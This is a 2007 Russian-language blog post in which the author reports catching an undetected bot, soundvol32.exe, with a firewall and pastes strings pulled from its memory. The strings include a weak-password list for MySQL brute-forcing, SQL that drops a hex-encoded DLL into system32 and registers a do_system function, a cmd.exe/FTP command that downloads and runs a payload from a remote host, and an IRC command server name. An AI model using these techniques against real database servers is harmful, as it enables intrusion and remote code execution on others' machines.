Post Friends My journal
zowers

Skonk-[ModBot]-Small-V0.4

Jun 08, 2007 05:16

сегодня совершенно случайно отловил вирус в файле soundvol32.exe
причём файрволом, когда soundvol32.exe попытался полезть в интернет
ни один (clamwin, avg, norton-ss, kaspersky) антивирусник его не опознаёт!

но мне удалось выдрать строки из памяти работающего вируса:

---
[skip]
Skonk-[ModBot]-Small-V0.4
soundvol32.exe
Please, send the following codes to info@oreans.com. Thank you.
3Cannot write oreans.vxd
oreans32.sys
oreansx64.sys
oreans32
\\.\oreans32
\\.\Global\oreans32
oreansx64
\\.\Global\oreansx64
%s\system32\drivers\%s
%s\syswow64\drivers\%s
%s\system32\drivers\oreans32.sys
3Cannot Update oreans.sys driver. Please, make sure that you have
administrator's permits the first time that you are going to run this program.

CHECK
Admin
123qwe
123asd
123abc
1234qwer
mine
letmein
company
name
dba
wwwadmin
owner
computer
NO_HOST
Cracked MYSQL - IP: [%s]->[%s] [USER]: %s [PASS]: %s

mysql
mailserver
Found MYSQL - IP:[%s]->[%s] PASS:[NULL]
Found MYSQL - IP:[%s]->[%s] USER:[%s] PASS:[%s]
SELECT do_system("cmd.exe /c echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s");
CREATE FUNCTION do_system RETURNS integer SONAME 'clown.dll';
SELECT * FROM clown INTO DUMPFILE 'h:/winnt/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'h:/windows/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'g:/winnt/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'g:/windows/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'f:/winnt/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'e:/winnt/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'e:/windows/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'c:/winnt/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'c:/windows/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll';
INSERT INTO clown (line) VALUES(0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000
000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F646
52E0D0D0A2400000000000000504500004C0108009804B3410022000030010000E00006200B010238000800000010000000020000001000000010000
000200000000084680010000000020000040000000100000004000000000000000090000000040000322501000300000000002000001000000000100
000100000000000001000000000400000490000000050000068010000000000000000000000000000000000000000000000000000006000009400000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000002E74657874000000940600000010000000080000000400000000000000000000000000006000006
02E64617461000000300000000020000000020000000C0000000000000000000000000000400000C02E6273730000000090000000003000000000000
000000000000000000000000000000000800000
CREATE TABLE clown (line BLOB);
DROP TABLE IF EXISTS clown;
[skip]
---

особенно мне нравится:

---
Please, contact support@oreans.com. Thank you!
-=|MAIN|=- Bot started
[06-08-2007 04:27:18] -=|MAIN|=- Bot started
irc.buztest.com
----

а вот официальная инфа про него: http://www.bleepingcomputer.com/startups/soundvol32.exe-18219.html

tech, virus, links

Leave a comment

Read comments 2
Previous post Next post
Up
Homepage Read journal... Full version Help Русская версия
© 1999-2024 LiveJournal, Inc.